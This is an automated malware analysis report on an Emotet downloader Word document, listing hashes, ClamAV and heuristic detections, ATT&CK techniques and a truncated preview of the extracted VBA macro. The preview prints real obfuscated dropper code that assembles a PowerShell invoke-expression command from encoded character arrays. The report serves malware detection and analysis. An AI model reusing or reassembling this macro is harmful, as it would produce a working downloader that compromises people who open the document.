Emotet Office (OLE) malware analysis — malicious · ea73652fbecb0539

MALICIOUS

Office (OLE)

234.5 KB Created: 2018-06-27 09:34:00 Authoring application: Microsoft Office Word First seen: 2018-07-18

MD5: fc1339f2f36c4fd6cd4676e4444537d1 SHA-1: c3e7cfe34dee897fd30fef869b4ea5004ec64f9f SHA-256: ea73652fbecb0539e46da02cb1ef6a9570f37548ad166d4c59af77bd3982bc08

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that utilizes the Shell() function. ClamAV identifies it as Doc.Downloader.Emotet-6877379-0, strongly suggesting it's a downloader for the Emotet banking trojan. The VBA script is heavily obfuscated but the presence of AutoOpen and Shell() calls indicates an attempt to execute external code, likely to download and run a secondary payload.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6877379-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6877379-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11168 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11168 bytes
SHA-256: `1b44683bffdbe1d6e974181739b0eb90b91b24c5a7dff91ae19b1f21b1668070`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "oALqvcbrjNY" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "hlwWpPMZNpBuon" Function avpfMm() On Error Resume Next zmFkH = Sin(81467) dJUkwh = 80272 zJAEO = cXVMWn toMMu = 71796 icoobb = 60719 uRijzP = CDate(44161) RjZEpTAiR = "Hel" + "l ." + Chr(40) + " " + "$PsHome" + "[21]" + Chr(43) + "$" + "psH" + "omE[3" + "4]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40) + " [sTr" + "InG]::" + "jO" + "In" + Chr(40) + "''" aFriSp = Sin(69316) falouh = 60798 VGKEGV = rTzPaj rdPvz = 17471 ljHih = 44635 zltZdq = CDate(30496) miYIYjT = ", " + Chr(40) + " " + "[ChAR" + "[]]" + Chr(40) + " 96, 40" + ",38," + " 47 ," + "121 , 4" wplzV = Sin(46653) AwKXpF = 64730 zIqdc = JGMBRN pItQb = 59733 kHtXG = 66995 fJzGCC = CDate(54452) GqcdLMXkHNu = "2,33" + " , 51 , " + "105," + "43 ,38" + ", " + "46, 3" qZoAJ = Sin(48073) McZBqP = 78667 ziWLW = OaCzfK uREftC = 92018 aEvpc = 11089 OzMJov = CDate(47335) JWEuDfQdBK = "3, 39 ," + "48" + ", 10" + "0, 1" + "0," + "33 ,48 " + ",1" + "06, 19 " + ",33, 38 " + ", 7 " + ",40 ,45," fJtNNa = Sin(81702) EXRWm = 46230 MNJqWi = qSTvzj SRDVNz = 15232 IiArop = 91464 CDjJt = CDate(80287) EOjfBh = " 33 , 42" + ",48,12" + "7,96 , " + "51" + ", 0, 2,1" + "21 " + ",99,44," DOKBLL = Sin(58957) zpavtR = 58852 iijvrn = Uiiqo FmjdYF = 63024 DWPioh = 78928 fwfCiF = CDate(51497) bLHoKjEzW = "48 " + ",48, 5" + "2,126" + ",107 , " + "107" + ",41 , " + "37 ," + "48, 3" bRLOcp = Sin(19770) BHtSK = 26525 jpMcw = RTiThb pBmCA = 22224 jmasr = 72397 LziiiN = CDate(60623) zCiZzRicp = "2 " + ", 37 " + ", 42 " + ",55" + ", 49 ,4" + "2, 37 ,4" + "2,43, 1" + "06," + "39, " + "43,4" + "1, 107 " + ", 5" BWEJM = Sin(70644) iBdHWO = 63449 aZLOh = JckTq aKJHoK = 8577 WFFlJ = 10825 nCivt = CDate(17023) ETWbi = "5 , " + "43 ,48 " + ", " + "52 , 4" + "5,33 " + ", 1" + "07 " + ",1" avpfMm = RjZEpTAiR + miYIYjT + GqcdLMXkHNu + JWEuDfQdBK + EOjfBh + bLHoKjEzW + zCiZzRicp + ETWbi iGsZi = CDate(38864) GwKXib = 56135 LwRjd = Sin(51902) szRnGq = RWEdw FjKdQ = 22463 CGNMS = 71852 End Function Function KdQautmPUjZ() On Error Resume Next twYSN = CDate(29845) kHrPK = 62738 vRzWwI = Sin(9120) SAtNP = tlkEV mGVFY = 99825 EbZRE = 73172 aFLBGEPqw = "24, 47 " + ", 21 ," + " 114 ,1" + "5,107" + ",4 ,44," + " 48 ," + "48 ," + "52 ,1" + "26, 107," + " 107 , 5" + "1 ,51 , " DjVccA = CDate(26092) sWnDJ = 64993 DiBcJf = Sin(3863) PCSPm = asiobX cmNHN = 30924 NZhFlI = 87077 HjrKcPijDR = "51 , 10" + "6 " + ", 55,3" + "7 ,61 ," + "35 , " + "45, " + "42,41,3" + "3, 32 " + ", " + "45 " + ", 37" + ",106" LbqDrs = CDate(71930) rpziFI = 61586 cuwKi = Sin(21738) twDqUN = ijroEn OkapJa = 83642 GMLzOw = 16744 miwuClfGVi = ", 39 , " + "43" + " , 41 , " + "107 ," + " 114" + " , 35 " + ",11 ,51 " + ", 6 " + ", " vsKcT = CDate(71957) JwrbO = 15343 CAWUu = Sin(5610) zFzFr = iXwhVY uGdQC = 16836 NSXAu = 40591 coumRhlC = "39, " + "107" + " ,4 , " + "44 ," + " 48, 48" + " , 52 ,1" + "26 ," voJJOL = CDate(23101) EsVVUW = 33541 Cfawjz = Sin(64216) TbYFt = jhwKW cWbNbV = 4560 NSnjXh = 17860 ZzoIibIj = " 10" + "7, 10" + "7,5" + "1,5" + "1, 5" + "1,106" + " ," + "34 " + ", 33, 3" + "2," KjIGG = CDate(96269) wvEhR = 14741 cbIulb = Sin(58274) zUSpBn = iLtGfT YHcpfR = 75275 skCGV = 74748 VTvvHdj = " 33, " + "54 " + ", 37 , " + "40 ,37" + ",54" + ", 41 , 5" KdQautmPUjZ = aFLBGEPqw + HjrKcPijDR + miwuClfGVi + coumRhlC + ZzoIibIj + VTvvHdj FinCj = CDate(43368) HjshY = 76812 VNoOoA = Sin(68073) slpGnb = nvRCGi zkiJt = 81554 JXLhN = 53732 End Function Function FdzCnpoQzr() On Error Resume Next jqrAJ = CDate(51725) qEzPwK = 91830 HhwdSa = Sin(7300) YizJj = iZZzE hdnSi = 65851 fDVrHw = 46532 TVEzW = "5 , 4" + "5, " + "42" + ", 48 " + ", 33 , " + "54" + " , 42 , " + "37 ,48,4" + "5 " + ", 43 ," RMjJwN = CDate(93852) OCiFD = 24561 Ho ... (truncated)

SHA-256: 1b44683bffdbe1d6e974181739b0eb90b91b24c5a7dff91ae19b1f21b1668070

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "oALqvcbrjNY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "hlwWpPMZNpBuon"
Function avpfMm()
On Error Resume Next
zmFkH = Sin(81467)
dJUkwh = 80272
zJAEO = cXVMWn
toMMu = 71796
icoobb = 60719
uRijzP = CDate(44161)
RjZEpTAiR = "Hel" + "l  ." + Chr(40) + " " + "$PsHome" + "[21]" + Chr(43) + "$" + "psH" + "omE[3" + "4]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40) + " [sTr" + "InG]::" + "jO" + "In" + Chr(40) + "''"
aFriSp = Sin(69316)
falouh = 60798
VGKEGV = rTzPaj
rdPvz = 17471
ljHih = 44635
zltZdq = CDate(30496)
miYIYjT = ", " + Chr(40) + " " + "[ChAR" + "[]]" + Chr(40) + " 96, 40" + ",38," + " 47 ," + "121 , 4"
wplzV = Sin(46653)
AwKXpF = 64730
zIqdc = JGMBRN
pItQb = 59733
kHtXG = 66995
fJzGCC = CDate(54452)
GqcdLMXkHNu = "2,33" + " , 51 , " + "105," + "43 ,38" + ", " + "46, 3"
qZoAJ = Sin(48073)
McZBqP = 78667
ziWLW = OaCzfK
uREftC = 92018
aEvpc = 11089
OzMJov = CDate(47335)
JWEuDfQdBK = "3, 39 ," + "48" + ", 10" + "0, 1" + "0," + "33 ,48 " + ",1" + "06, 19 " + ",33, 38 " + ", 7 " + ",40 ,45,"
fJtNNa = Sin(81702)
EXRWm = 46230
MNJqWi = qSTvzj
SRDVNz = 15232
IiArop = 91464
CDjJt = CDate(80287)
EOjfBh = " 33 , 42" + ",48,12" + "7,96 , " + "51" + ", 0, 2,1" + "21 " + ",99,44,"
DOKBLL = Sin(58957)
zpavtR = 58852
iijvrn = Uiiqo
FmjdYF = 63024
DWPioh = 78928
fwfCiF = CDate(51497)
bLHoKjEzW = "48 " + ",48, 5" + "2,126" + ",107 , " + "107" + ",41 , " + "37 ," + "48, 3"
bRLOcp = Sin(19770)
BHtSK = 26525
jpMcw = RTiThb
pBmCA = 22224
jmasr = 72397
LziiiN = CDate(60623)
zCiZzRicp = "2 " + ", 37 " + ", 42 " + ",55" + ", 49 ,4" + "2, 37 ,4" + "2,43, 1" + "06," + "39, " + "43,4" + "1, 107 " + ", 5"
BWEJM = Sin(70644)
iBdHWO = 63449
aZLOh = JckTq
aKJHoK = 8577
WFFlJ = 10825
nCivt = CDate(17023)
ETWbi = "5 , " + "43 ,48 " + ", " + "52 , 4" + "5,33 " + ", 1" + "07 " + ",1"
avpfMm = RjZEpTAiR + miYIYjT + GqcdLMXkHNu + JWEuDfQdBK + EOjfBh + bLHoKjEzW + zCiZzRicp + ETWbi
iGsZi = CDate(38864)
GwKXib = 56135
LwRjd = Sin(51902)
szRnGq = RWEdw
FjKdQ = 22463
CGNMS = 71852
End Function
Function KdQautmPUjZ()
On Error Resume Next
twYSN = CDate(29845)
kHrPK = 62738
vRzWwI = Sin(9120)
SAtNP = tlkEV
mGVFY = 99825
EbZRE = 73172
aFLBGEPqw = "24, 47 " + ", 21 ," + " 114 ,1" + "5,107" + ",4 ,44," + " 48 ," + "48 ," + "52 ,1" + "26, 107," + " 107 , 5" + "1 ,51 , "
DjVccA = CDate(26092)
sWnDJ = 64993
DiBcJf = Sin(3863)
PCSPm = asiobX
cmNHN = 30924
NZhFlI = 87077
HjrKcPijDR = "51 , 10" + "6 " + ", 55,3" + "7 ,61 ," + "35 , " + "45, " + "42,41,3" + "3, 32 " + ", " + "45 " + ", 37" + ",106"
LbqDrs = CDate(71930)
rpziFI = 61586
cuwKi = Sin(21738)
twDqUN = ijroEn
OkapJa = 83642
GMLzOw = 16744
miwuClfGVi = ", 39 , " + "43" + " , 41 , " + "107 ," + " 114" + " , 35 " + ",11 ,51 " + ", 6 " + ", "
vsKcT = CDate(71957)
JwrbO = 15343
CAWUu = Sin(5610)
zFzFr = iXwhVY
uGdQC = 16836
NSXAu = 40591
coumRhlC = "39, " + "107" + " ,4 , " + "44 ," + " 48, 48" + " , 52 ,1" + "26 ,"
voJJOL = CDate(23101)
EsVVUW = 33541
Cfawjz = Sin(64216)
TbYFt = jhwKW
cWbNbV = 4560
NSnjXh = 17860
ZzoIibIj = " 10" + "7, 10" + "7,5" + "1,5" + "1, 5" + "1,106" + " ," + "34 " + ", 33, 3" + "2,"
KjIGG = CDate(96269)
wvEhR = 14741
cbIulb = Sin(58274)
zUSpBn = iLtGfT
YHcpfR = 75275
skCGV = 74748
VTvvHdj = " 33, " + "54 " + ", 37 , " + "40 ,37" + ",54" + ", 41 , 5"
KdQautmPUjZ = aFLBGEPqw + HjrKcPijDR + miwuClfGVi + coumRhlC + ZzoIibIj + VTvvHdj
FinCj = CDate(43368)
HjshY = 76812
VNoOoA = Sin(68073)
slpGnb = nvRCGi
zkiJt = 81554
JXLhN = 53732
End Function
Function FdzCnpoQzr()
On Error Resume Next
jqrAJ = CDate(51725)
qEzPwK = 91830
HhwdSa = Sin(7300)
YizJj = iZZzE
hdnSi = 65851
fDVrHw = 46532
TVEzW = "5 , 4" + "5, " + "42" + ", 48 " + ", 33 , " + "54" + " , 42 , " + "37 ,48,4" + "5 " + ", 43 ,"
RMjJwN = CDate(93852)
OCiFD = 24561
Ho
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.